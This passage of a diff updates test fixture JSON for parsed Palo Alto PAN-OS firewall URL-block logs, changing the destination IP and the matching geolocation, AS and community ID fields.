"1:0FqP8MVruPuvjAz59u+Gj/lzSGo=" ], "transport": "tcp", "application": "ssl", @@ -3933,14 +3979,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767976722Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691774900Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -3963,26 +4009,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3998,14 +4046,14 @@ "port": 53007, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4020,7 +4068,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qCp/BEY5ANYRj3J+xhPpjW00kTA=" + "community_id": "1:eq5SLfcTcU4mZ4g5wLjNF7kHsW0=" } }, "threat_category": "unknown", @@ -4065,8 +4113,8 @@ ], "network": { "community_id": [ - "1:63h3SPrH4/pr2GMJEkpg++zeJMU=", - "1:qCp/BEY5ANYRj3J+xhPpjW00kTA=" + "1:wTKe67Cvy+IC7F5EIMomomT6ztk=", + "1:eq5SLfcTcU4mZ4g5wLjNF7kHsW0=" ], "transport": "tcp", "application": "ssl", @@ -4105,14 +4153,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767980948Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691782700Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4135,26 +4183,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4170,14 +4220,14 @@ "port": 53008, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4192,7 +4242,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:QTdF07Qsc5riXT20oN+YWQ2Yt6U=" + "community_id": "1:4kwfarqeUgitq2Mp3dZlCh0FLtw=" } }, "threat_category": "unknown", @@ -4237,8 +4287,8 @@ ], "network": { "community_id": [ - "1:MpnxD3AYYy43RYm8rBQmgxv2NQ0=", - "1:QTdF07Qsc5riXT20oN+YWQ2Yt6U=" + "1:VLVokhfWAFkBzuEhAuorsFWSkMM=", + "1:4kwfarqeUgitq2Mp3dZlCh0FLtw=" ], "transport": "tcp", "application": "ssl", @@ -4277,14 +4327,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768022704Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691788200Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4307,26 +4357,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4342,14 +4394,14 @@ "port": 53010, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4364,7 +4416,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:v9tvyVPSkJni3/nd8jUVgcsqqQk=" + "community_id": "1:uBQde+10yg+hMJw8YmAHupesfX4=" } }, "threat_category": "unknown", @@ -4409,8 +4461,8 @@ ], "network": { "community_id": [ - "1:kibVei9WSdxBMV8iUIg8nZMCiss=", - "1:v9tvyVPSkJni3/nd8jUVgcsqqQk=" + "1:kqcVjslXHVTg+V8o9wHnMVL+u+k=", + "1:uBQde+10yg+hMJw8YmAHupesfX4=" ], "transport": "tcp", "application": "ssl", @@ -4449,14 +4501,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768032828Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691794800Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4479,26 +4531,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4514,14 +4568,14 @@ "port": 53011, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4536,7 +4590,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:00oN9bToRGtVdpy+GQ742sbkpfI=" + "community_id": "1:lV9xe2dpiqoz95S0AQewPBhBUoQ=" } }, "threat_category": "unknown", @@ -4581,8 +4635,8 @@ ], "network": { "community_id": [ - "1:l33FK2i+ASkvlnDYQYRCH4evHcI=", - "1:00oN9bToRGtVdpy+GQ742sbkpfI=" + "1:0otVMQCQ30HFRQUJTr4+alcjwcg=", + "1:lV9xe2dpiqoz95S0AQewPBhBUoQ=" ], "transport": "tcp", "application": "ssl", @@ -4621,14 +4675,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768036959Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691801100Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4651,26 +4705,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4686,14 +4742,14 @@ "port": 53012, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4708,7 +4764,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:AmJtkqyAyzgRUMxNGxjT3hhwb8c=" + "community_id": "1:mWhX5kk3U7lwbuZ6aeWuXQ+OJK0=" } }, "threat_category": "unknown", @@ -4753,8 +4809,8 @@ ], "network": { "community_id": [ - "1:cSD3ZfDTv0BFEStL/v2rRm0wow0=", - "1:AmJtkqyAyzgRUMxNGxjT3hhwb8c=" + "1:OWWjhlzrd2mpWDKP37qJh8lwa6s=", + "1:mWhX5kk3U7lwbuZ6aeWuXQ+OJK0=" ], "transport": "tcp", "application": "ssl", @@ -4793,14 +4849,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768040958Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691807400Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4823,26 +4879,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4858,14 +4916,14 @@ "port": 53013, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -4880,7 +4938,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CzGrIa22/gNrIvkcJMIh6eWNjFI=" + "community_id": "1:0jH7ur3HpAk757F68Xuoh7OL0uI=" } }, "threat_category": "unknown", @@ -4925,8 +4983,8 @@ ], "network": { "community_id": [ - "1:l8cnTJWO0qdKrXtvCBWHbQUpvgE=", - "1:CzGrIa22/gNrIvkcJMIh6eWNjFI=" + "1:FIZyD/FpcrfJdxESBSGBv5L/f3Q=", + "1:0jH7ur3HpAk757F68Xuoh7OL0uI=" ], "transport": "tcp", "application": "ssl", @@ -4965,14 +5023,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768044978Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691813700Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -4995,26 +5053,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5030,14 +5090,14 @@ "port": 53014, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5052,7 +5112,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:b3MpSidntZseAvCtO89765ETlyI=" + "community_id": "1:2B3KDgrQ/ZoQIB3taLKfajXpk6Y=" } }, "threat_category": "unknown", @@ -5097,8 +5157,8 @@ ], "network": { "community_id": [ - "1:2dLIQC1NuJw/6kPkSukOc7rN5UE=", - 